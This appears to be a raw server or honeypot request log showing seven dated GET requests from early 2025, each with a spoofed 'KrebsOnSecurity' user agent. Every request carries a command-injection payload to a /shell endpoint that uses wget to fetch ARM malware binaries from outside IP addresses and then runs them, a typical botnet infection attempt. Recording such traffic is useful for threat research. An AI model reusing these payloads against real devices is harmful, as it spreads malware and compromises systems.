Feb. 5, 2025, 4:38 p.m. —
GET
/shell?cd+/tmp;rm+holdarm+hold.arm7;wget+http:/\x5C/193.143.1.19/bins/hold.arm7;chmod+777+hold.arm7;./hold.arm7+hold.jaws;wget+http:/\x5C/193.143.1.19/bins/hold.arm;chmod+777+hold.arm;./hold.arm+hold.jaws
→ 301
User-Agent: KrebsOnSecurity
Jan. 23, 2025, 12:07 a.m. —
GET
/shell?cd+/tmp;rm+holdarm+hold.arm7;wget+http:/\x5C/193.143.1.66/bins/hold.arm7;chmod+777+hold.arm7;./hold.arm7+hold.jaws;wget+http:/\x5C/193.143.1.66/bins/hold.arm;chmod+777+hold.arm;./hold.arm+hold.jaws
→ 301
User-Agent: KrebsOnSecurity
Jan. 22, 2025, 11:32 p.m. —
GET
/shell?cd+/tmp;rm+holdarm+hold.arm7;wget+http:/\x5C/193.143.1.66/bins/hold.arm7;chmod+777+hold.arm7;./hold.arm7+hold.jaws;wget+http:/\x5C/193.143.1.66/bins/hold.arm;chmod+777+hold.arm;./hold.arm+hold.jaws
→ 301
User-Agent: KrebsOnSecurity
Jan. 22, 2025, 11:57 a.m. —
GET
/shell?cd+/tmp;rm+holdarm+hold.arm7;wget+http:/\x5C/193.143.1.66/bins/hold.arm7;chmod+777+hold.arm7;./hold.arm7+hold.jaws;wget+http:/\x5C/193.143.1.66/bins/hold.arm;chmod+777+hold.arm;./hold.arm+hold.jaws
→ 301
User-Agent: KrebsOnSecurity
Jan. 22, 2025, 10:17 a.m. —
GET
/shell?cd+/tmp;rm+holdarm+hold.arm7;wget+http:/\x5C/193.143.1.66/bins/hold.arm7;chmod+777+hold.arm7;./hold.arm7+hold.jaws;wget+http:/\x5C/193.143.1.66/bins/hold.arm;chmod+777+hold.arm;./hold.arm+hold.jaws
→ 301
User-Agent: KrebsOnSecurity
Jan. 21, 2025, 9:25 p.m. —
GET
/shell?cd+/tmp;rm+holdarm+hold.arm7;wget+http:/\x5C/193.143.1.66/bins/hold.arm7;chmod+777+hold.arm7;./hold.arm7+hold.jaws;wget+http:/\x5C/193.143.1.66/bins/hold.arm;chmod+777+hold.arm;./hold.arm+hold.jaws
→ 301
User-Agent: KrebsOnSecurity
Jan. 21, 2025, 8:50 p.m. —
GET
/shell?cd+/tmp;rm+holdarm+hold.arm7;wget+http:/\x5C/193.143.1.66/bins/hold.arm7;chmod+777+hold.arm7;./hold.arm7+hold.jaws;wget+http:/\x5C/193.143.1.66/bins/hold.arm;chmod+777+hold.arm;./hold.arm+hold.jaws
→ 301
User-Agent: KrebsOnSecurity